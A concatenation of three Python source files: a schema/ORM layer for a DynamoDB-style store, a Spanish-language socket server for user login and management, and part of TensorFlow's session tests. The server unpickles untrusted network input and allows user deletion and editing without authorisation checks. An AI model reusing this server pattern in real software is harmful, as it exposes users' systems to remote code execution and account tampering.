Generated fields are created after field validation. For instance: on a blog
post, you want to capture the number of words, it could be a generated field.
Those fields are saved into the database.
**Operations**
Field operations are used for two things: the first is to validate all the
possible value this operation contains (by using the field itself) and the
second is to write the correct query.
For example: ``fetch_one(dict(username=Equal('michael')))``, will convert the
key into ```username__eq``` in dynamodb.
**Some examples**
Create a basic schema::
user = models.Schema(table, **fields)
Create a schema that has generated fields:
user = models.Schema(table, **fields)
@user.generated('username')
def add_username_to_hisory(model):
# do something.
return model
Create extensions::
user = models.Schema(collection, **fields)
@user.extension('messages')
def profile(obj):
# get the profile for the user.
return profile
"""
from collections import namedtuple
from copy import deepcopy
from threading import Thread
from oto import response
from oto import status
from sukimu import consts
from sukimu import exceptions
from sukimu import operations
from sukimu import utils
class Schema():
def __init__(self, table, *indexes, **fields):
"""Initialize the Schema.
Args:
table (string): Name of the table or string.
options (dict): All the schema options.
"""
self.table = table
self.indexes = indexes
self.fields = fields
self.fields_dependencies = utils.key_dict(fields, default=[])
self.extensions = dict()
# Register the schema with the table.
self.table.set_schema(self)
def validate(self, values, operation):
"""Validate the model.
Args:
values (dict): The values to validate.
operation (int): The different operations
(correspond to schema operations).
Return:
Response.
"""
data = dict()
errors = dict()
success = False
items = set(values.keys())
if operation is operations.READ and not values:
return response.Response()
if operation is operations.CREATE:
items = set(self.fields.keys())
for name in items:
field = self.fields.get(name)
if not field:
continue
try:
value = values.get(name)
if isinstance(value, operations.Base):
value = value.validate(field)
data[name] = value
continue
data[name] = field.validate(value)
except exceptions.FieldException as e:
errors[name] = e.args[0]
status = False
if errors:
return response.create_error_response(
consts.ERROR_CODE_VALIDATION, errors)
return response.Response(message=data)
def ensure_indexes(self, validation_response, current=None):
"""Ensure index unicity.
One particularity of an index: it should be unique. For example in
DynamoDb: an index has a hash and a range, combined, they represent the
key of that specific row – and thus should be unique.
If an index only has one key, that key on its own should also be
unique (e.g. user_id).
Args:
validation_response (Response): The validation response that
contains the validated fields.
current (dict): Operations such as update requires to check against
the found ancestor and the current row that needs to be
validated.
Return:
Response: The response
"""
if not validation_response:
return validation_response
data = validation_response.message
errors = {}
current = current or {}
for index in self.indexes:
# Some databases allow to have non unique indexes. In this case,
# we ignore this index for the check.
if not index.unique:
continue
keys = index.keys
query = dict()
for key in keys:
key_value = data.get(key, current.get(key))
if not key_value:
break
query.update({key: operations.Equal(key_value)})
if not query:
continue
ancestor = self.fetch_one(**query)
if ancestor:
if not current or dict(ancestor.message) != dict(current):
errors.update({
key: exceptions.FIELD_ALREADY_USED for key in keys})
if errors:
return response.create_error_response(
consts.ERROR_CODE_DUPLICATE_KEY, errors)
return response.Response()
def generated(self, **dependencies):
"""Register a generated field.
Generated fields may have some dependencies. If a specific has been
updated for instance, the generated field will also need to be updated.
If the generated field needs to be updated everytime.
Args:
dependencies (dict): The dependencies for this specific generated
field.
Return:
Response: the response with the generated value.
"""
return NotImplemented
def extension(self, name):
"""Register an extension.
Args:
name (string): Name of the extension.
"""
def wrapper(method):
self.extensions.update({name: method})
return method
return wrapper
def fetch(self, fields=None, limit=None, sort=None, index=None,
context=None, **query):
"""Query the table to find all the models that correspond to the query.
Args:
fields (list): the list of fields to return on each of the items.
limit (int): optional limit on how many items need to be fetched.
sort (int): if the results should be sorted, and if so, in which
order.
index (str): name of the index to use.
context (dict): additional context to provide (used by extensions)
query (dict): fields to query on.
Return:
Response: the data of the request.
"""
validation_response = self.validate(query, operation=operations.READ)
if not validation_response:
return validation_response
schema_response = self.table.fetch(
query, sort=sort, limit=limit, index=index)
if schema_response and fields:
self.decorate_response(schema_response, fields, context=context)
return schema_response
def fetch_one(self, fields=None, context=None, **query):
"""Fetch one specific item.
Args:
fields (list): the list of fields to return on the item.
query (dict): the request fields to search on.
context (dict): optional context (used by extensions).
Return:
Response: the data from the request.
"""
validation_response = self.validate(query, operation=operations.READ)
if not validation_response:
return validation_response
schema_response = self.table.fetch_one(**query)
if schema_response and fields:
self.decorate_response(schema_response, fields, context=context)
return schema_response
def decorate_response(self, response, fields, context=None):
"""Decorate a response.
Args:
item (dict): The current item.
fields (dict): The fields that are need to be provided to the main
item.
context (dict): Additional context to provide to each extension.
Return:
Response: the decorated response.
"""
if (isinstance(fields, list) or isinstance(fields, tuple) or
isinstance(fields, set)):
fields = utils.dict_from_strings(fields)
data = response.message
if isinstance(data, list):
data = [
self.decorate(dict(item), fields, context) for item in data]
else:
data = self.decorate(dict(data), fields, context)
response.message = data
def decorate(self, item, fields, context=None):
"""Decorate an item with more fields.
Decoration means that some fields are going to be added to the initial
item (using the extension with the same name.) The fields that are
expected from this extension are also being passed.
Fields are also cleaning the response object (unless unspecified.) For
instance if you fetch one `user` with the fields `user.id`, only the id
will be returned.
Args:
item (dict): The current item.
fields (dict): The fields that are need to be provided to the main
item.
context (dict): Additional context to provide to each extension.
Return:
Response: the decorated response.
"""
def activate_extension(field, item, context=None):
extension = self.extensions.get(field)
if not extension:
return
kwargs = {}
if 'context' in extension.__code__.co_varnames:
kwargs.update(context=context)
item.update({field: extension(item, fields.get(field), **kwargs)})
table_fields = fields.pop(self.table.name, -1)
threads = []
for field in fields:
thread = Thread(
target=activate_extension, args=(field, item, context))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
if table_fields == -1:
return item
keys = list(item.keys())
for key in keys:
if key not in table_fields:
item.pop(key)
if len(item) == len(table_fields):
return item
return item
def create(self, **data):
"""Create a model from the data passed.
"""
validation = self.validate(data, operation=operations.CREATE)
if not validation:
return validation
check = self.ensure_indexes(validation)
if not check:
return check
data = self.table.create(validation.message)
return response.Response(message=data)
def update(self, source, **data):
"""Update the model from the data passed.
"""
if not source:
return response.create_error_response(
message='The source cannot be empty.')
data = utils.key_exclude(data, source.keys())
data = self.validate(data, operation=operations.READ)
if not data:
return data
# Recreate the object - check ancestors.
current = self.fetch_one(**{
key: operations.Equal(val) for key, val in source.items()})
if not current:
return current
fields = response.Response(
message=dict(list(source.items()) + list(data.message.items())))
ancestors = self.ensure_indexes(fields, current.message)
if not ancestors:
return ancestors
return self.table.update(current, fields.message)
def delete(self, **source):
"""Delete the model(s) from the data passed.
"""
item = self.fetch_one(**source)
if not item:
return item
return self.table.delete(item.message)
def extends(self, **fields):
"""Extending a Schema.
Extension of a schema allows to add new fields. If you have a table
with users, some users might require different fields (for instance,
if the user has a gaming console, you might want to get more details
about this gaming console.)
"""
fields = utils.dict_merge(self.fields, fields)
table = self.table.copy()
indexes = deepcopy(self.indexes)
return Schema(table, *indexes, **fields)
class Table():
def __init__(self, name):
self.name = name
self.indexes = {}
def set_schema(self, schema):
self.schema = schema
for index in self.schema.indexes:
self.add_index(index)
def add_index(self, index):
return NotImplemented
def find_index(self, fields):
for index in self.indexes.values():
if len(fields) == 2:
is_hash = index.hash in (fields[0], fields[1])
is_range = index.range in (fields[0], fields[1])
if is_hash and is_range:
return index
if len(fields) == 1 and index.hash == fields[0]:
return index
def create(self, data):
return NotImplemented
def delete(self, source):
return NotImplemented
def update(self, source, data):
return NotImplemented
def fetch(self, query, sort=None, limit=None):
return NotImplemented
def fetch_one(self, **query):
return NotImplemented
def create_table(self):
return NotImplemented
def copy(self):
return NotImplemented
class Index():
PRIMARY = 1
LOCAL = 2
GLOBAL = 3
def __init__(self, *keys, name=None, unique=True):
self.name = name
self.keys = list(keys)
self.unique = unique
|
server.py
|
from socket import *
from threading import *
import pickle
import DB
clientes = {}
direcciones = {}
clientes_on = []
DB.CREATE_DB()
DB.CREATE_TABLES()
def configuracion():
global servidor, mensaje
servidor = socket()
servidor.bind(("", 9999))
servidor.listen(10)
print("Esperando conexiones...")
aceptar_hilo = Thread(target=aceptar_conexiones)
aceptar_hilo.start()
aceptar_hilo.join()
def aceptar_conexiones():
while True:
global direccion_cliente
cliente_local, direccion_cliente = servidor.accept()
print("%s:%s conectado. "% direccion_cliente)
direcciones[cliente_local] = direccion_cliente
Thread(target=encargarse_cliente,args=(cliente_local,)).start()
def encargarse_cliente(cliente):
global mensaje
while True:
opcion = cliente.recv(1024).decode("utf-8")
#================================LOGIN
if opcion == 'login':
print("login")
user_info = cliente.recv(1024)
user_info = pickle.loads(user_info)
result = DB.SEARCH_USER_LOGIN(user_info[0], user_info[1])
if result is None:
cliente.send(bytes("error", "utf-8"))
DB.ADD_LOG(user_info[0],"Intento Fallido", "%s:%s"% direccion_cliente)
else:
cliente.send(bytes("exito", "utf-8"))
DB.ADD_LOG(user_info[0],"Intento Exitoso", "%s:%s"% direccion_cliente)
#envia el nombre de usuario y level
user_logged = [result[0], result[1], result[2], result[3], result[4]]
result = [result[1], result[4], result[2]]
data_string = pickle.dumps(result)
cliente.send(data_string)
clientes[cliente] = user_logged[1]
clientes_on.append(user_logged[1])
if opcion == 'editar':
print("editar")
user_edit = cliente.recv(1024)
user_edit = pickle.loads(user_edit)
if user_edit[2] == '':
DB.UPDATE_CUENTA(user_logged[0], user_edit[0], user_edit[1], user_logged[3])
else:
DB.UPDATE_CUENTA(user_logged[0], user_edit[0], user_edit[1], user_edit[2])
user_logged[2] = user_edit[1]
user_logged[1] = user_edit[0]
#================================USUARIOS
if opcion == "listar_usuarios":
print("listar usuarios")
result = DB.SELECT_USERS()
data_string = pickle.dumps(result)
cliente.send(data_string)
if opcion == "buscar_usuarios":
print("buscar usuarios")
filtro = cliente.recv(1024).decode("utf-8")
result = DB.SELECT_USERS_FILTER(filtro)
data_string = pickle.dumps(result)
cliente.send(data_string)
if opcion == "eliminar_usuario":
print("eliminar usuario")
user_code = cliente.recv(1024).decode("utf-8")
DB.DELETE_USER(user_code)
if opcion == "crear_usuario":
print("crear usuario")
user_new = cliente.recv(1024)
user_new = pickle.loads(user_new)
print(user_new)
DB.CREATE_USER(user_new[0], user_new[1], user_new[2], user_new[3])
if opcion == 'editar_usuario':
print("editar usuario")
user_edit = cliente.recv(1024)
user_edit = pickle.loads(user_edit)
DB.UPDATE_USER(user_edit[0], user_edit[1], user_edit[2])
#================================HOME
if opcion == "listar_usuarios_online":
print("listar usuarios online")
print(clientes_on)
data_string = pickle.dumps(clientes_on)
cliente.send(data_string)
#=================================MENSAJES
if __name__ == "__main__":
configuracion()
|
session_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import threading
import time
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.util import compat
# NOTE(mrry): Dummy shape registration for op used in the tests.
ops.RegisterShape('ConstructionFails')(None)
class SessionTest(test_util.TensorFlowTestCase):
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(np.asarray([[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]],
dtype=np.float32), copy_val)
def testManyCPUs(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testPerSessionThreads(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testSessionInterOpThreadPool(self):
config = config_pb2.ConfigProto()
pool = config.session_inter_op_thread_pool.add()
with session.Session(config=config) as s:
inp = constant_op.constant(10.0, name='W1')
results = s.run([inp])
self.assertAllEqual([10.0], results)
pool = config.session_inter_op_thread_pool.add()
pool.num_threads = 1
with session.Session(config=config) as s:
inp = constant_op.constant(20.0, name='W2')
results = s.run([inp])
self.assertAllEqual([20.0], results)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
def testOpConstructionErrorPayload(self):
with session.Session():
failing_op = ops.get_default_graph().create_op(
'ConstructionFails', [], [], name='f')
def exc_predicate(e):
return (e.op == failing_op
and e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
failing_op.run()
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
# pylint: disable=protected-access
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
# pylint: enable=protected-access
def exc_predicate(e):
return (e.op == c.op
and e.op._original_op == b.op
and e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchNone(self):
with session.Session() as s:
a = constant_op.constant(1.0)
with self.assertRaises(TypeError):
s.run(None)
with self.assertRaises(TypeError):
s.run([None])
with self.assertRaises(TypeError):
s.run({'b': None})
with self.assertRaises(TypeError):
s.run({'a': a, 'b': None})
def testFetchSingleton(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
def testFetchSingletonByName(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a.name)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
def testFetchList(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
v = variables.Variable([54.0])
assign = v.assign([63.0])
res = sess.run([a, b, c, a.name, assign.op])
self.assertTrue(isinstance(res, list))
self.assertEqual(42.0, res[0])
self.assertEqual(None, res[1])
self.assertEqual(44.0, res[2])
self.assertEqual(42.0, res[3])
self.assertEqual(None, res[4])
self.assertEqual(63.0, sess.run(v))
def testFetchTuple(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run((a, b, c, a.name))
self.assertTrue(isinstance(res, tuple))
self.assertEqual(42.0, res[0])
self.assertEqual(None, res[1])
self.assertEqual(44.0, res[2])
self.assertEqual(42.0, res[3])
def testFetchNamedTuple(self):
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
# pylint: enable=invalid-name
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(ABC(a, b, c))
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
def testFetchDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run({'a': a, 'b': b, 'c': c})
self.assertTrue(isinstance(res, dict))
self.assertEqual(42.0, res['a'])
self.assertEqual(None, res['b'])
self.assertEqual(44.0, res['c'])
def testFetchNestingOneLevel(self):
with session.Session() as sess:
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g'])
# pylint: enable=invalid-name
a_val = 42.0
b_val = None
c_val = 44.0
a = constant_op.constant(a_val)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(c_val)
# List of lists, tuples, namedtuple, and dict
res = sess.run([[a, b, c], (a, b, c), ABC(a=a, b=b, c=c),
{'a': a.name, 'c': c, 'b': b}])
self.assertTrue(isinstance(res, list))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Tuple of lists, tuples, namedtuple, and dict
res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c),
{'a': a, 'c': c, 'b': b}))
self.assertTrue(isinstance(res, tuple))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Namedtuple of lists, tuples, namedtuples, and dict
res = sess.run(DEFG(d=[a, b, c],
e=(a, b, c),
f=ABC(a=a.name, b=b, c=c),
g={'a': a, 'c': c, 'b': b}))
self.assertTrue(isinstance(res, DEFG))
self.assertTrue(isinstance(res.d, list))
self.assertEqual(a_val, res.d[0])
self.assertEqual(b_val, res.d[1])
self.assertEqual(c_val, res.d[2])
self.assertTrue(isinstance(res.e, tuple))
self.assertEqual(a_val, res.e[0])
self.assertEqual(b_val, res.e[1])
self.assertEqual(c_val, res.e[2])
self.assertTrue(isinstance(res.f, ABC))
self.assertEqual(a_val, res.f.a)
self.assertEqual(b_val, res.f.b)
self.assertEqual(c_val, res.f.c)
self.assertTrue(isinstance(res.g, dict))
self.assertEqual(a_val, res.g['a'])
self.assertEqual(b_val, res.g['b'])
self.assertEqual(c_val, res.g['c'])
# Dict of lists, tuples, namedtuples, and dict
res = sess.run({'d': [a, b, c],
'e': (a, b, c),
'f': ABC(a=a, b=b, c=c),
'g': {'a': a.name, 'c': c, 'b': b}})
self.assertTrue(isinstance(res, dict))
self.assertTrue(isinstance(res['d'], list))
self.assertEqual(a_val, res['d'][0])
self.assertEqual(b_val, res['d'][1])
self.assertEqual(c_val, res['d'][2])
self.assertTrue(isinstance(res['e'], tuple))
self.assertEqual(a_val, res['e'][0])
self.assertEqual(b_val, res['e'][1])
self.assertEqual(c_val, res['e'][2])
self.assertTrue(isinstance(res['f'], ABC))
self.assertEqual(a_val, res['f'].a)
self.assertEqual(b_val, res['f'].b)
self.assertEqual(c_val, res['f'].c)
self.assertTrue(isinstance(res['g'], dict))
self.assertEqual(a_val, res['g']['a'])
self.assertEqual(b_val, res['g']['b'])
self.assertEqual(c_val, res['g']['c'])
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]})
self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_dict['b'])
self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0])
self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1])
# Test nested structures
results_with_nested_list = s.run([[[a, b], b], a, [a, b]])
self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_nested_list[0][0][1])
self.assertAllEqual(results_with_nested_list[0][0][0],
results_with_nested_list[1])
self.assertAllEqual(results_with_nested_list[1],
results_with_nested_list[2][0])
self.assertAllEqual(results_with_nested_list[0][0][1],
results_with_nested_list[0][1])
self.assertAllEqual(results_with_nested_list[0][1],
results_with_nested_list[2][1])
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float16, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Dict fetch
xy = s.run({'xy': tf_xy})['xy']
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Nested list fetch
xy = s.run([[[tf_xy]], tf_xy, [tf_xy]])
self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]])
self.assertEqual(scalar, type(xy[0][0][0]))
self.assertEqual(scalar, type(xy[1]))
self.assertEqual(scalar, type(xy[2][0]))
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
constant_op.constant(indices),
constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Dict fetch (single value), use as tuple
indices_out, values_out, shape_out = s.run({'sp': sp})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch (list value), use as tuple
(indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch, use as SparseTensorValue
sp_out = s.run({'sp': sp})['sp']
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Nested list fetch use as tuple
sp_out = s.run([[[sp]], sp])
indices_out, values_out, shape_out = sp_out[0][0][0]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
indices_out, values_out, shape_out = sp_out[1]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Nested list fetch, use as SparseTensorValue
sp_out = s.run([[[sp]], sp])
self.assertAllEqual(sp_out[0][0][0].indices, indices)
self.assertAllEqual(sp_out[0][0][0].values, values)
self.assertAllEqual(sp_out[0][0][0].shape, shape)
self.assertAllEqual(sp_out[1].indices, indices)
self.assertAllEqual(sp_out[1].values, values)
self.assertAllEqual(sp_out[1].shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with tuple, fetch sp directly
sp_out = s.run(sp, {sp: (indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.shape, shape)
# Feed SparseTensorValue and fetch sp directly.
sp_out = s.run(sp, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
def testFeedSparsePlaceholder(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.shape, shape)
def testFeedSparePlaceholderConstantShape(self):
with session.Session() as s:
